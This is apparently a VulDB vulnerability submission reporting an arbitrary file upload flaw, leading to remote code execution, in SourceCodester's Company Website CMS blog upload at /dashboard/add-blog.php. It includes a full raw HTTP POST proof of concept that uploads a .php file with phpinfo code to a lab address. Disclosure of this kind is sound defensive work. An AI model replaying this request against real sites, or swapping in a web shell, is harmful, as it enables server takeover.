إرسال #43177: Company website CMS------backend blog management RCEالمعلومات

عنوانCompany website CMS------backend blog management RCE
الوصفinfo:There is an arbitrary file upload vulnerability in the company's website CMS background add-blog Add a blog in the background, upload attachments, capture packets, and modify the attachment suffix to php as needed. Modify the content of the attachment to realize RCE by php code getshell. Then traverse the URL:/dashboard/uploads/blog/xxxxx.php access payload: POST /dashboard/add-blog.php HTTP/1.1 Host: 192.168.153.1:8090 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------2960604280433651870831976 Content-Length: 674 Origin: http://192.168.153.1:8090 Connection: close Referer: http://192.168.153.1:8090/dashboard/add-blog.php Cookie: PHPSESSID=0n5rjh4b6tqupjl95toh92f4jb Upgrade-Insecure-Requests: 1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_title" t1 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_desc" t2 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="blog_detail" t3 -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="ufile"; filename="123.php" Content-Type: image/png <?php phpinfo();?> -----------------------------2960604280433651870831976 Content-Disposition: form-data; name="save" -----------------------------2960604280433651870831976--
المصدر⚠️ https:// www.sourcecodester.com/php/15517/company-website-cms-php.html
المستخدم
 jsbae3449 (UID 30775)
ارسال09/08/2022 04:54 PM (4 سنوات منذ)
الاعتدال09/08/2022 06:54 PM (2 hours later)
الحالةتمت الموافقة
إدخال VulDB205882 [SourceCodester Company Website CMS Add Blog /dashboard/add-blog.php ufile تجاوز الصلاحيات]
النقاط20

Do you know our Splunk app?

Download it now for free!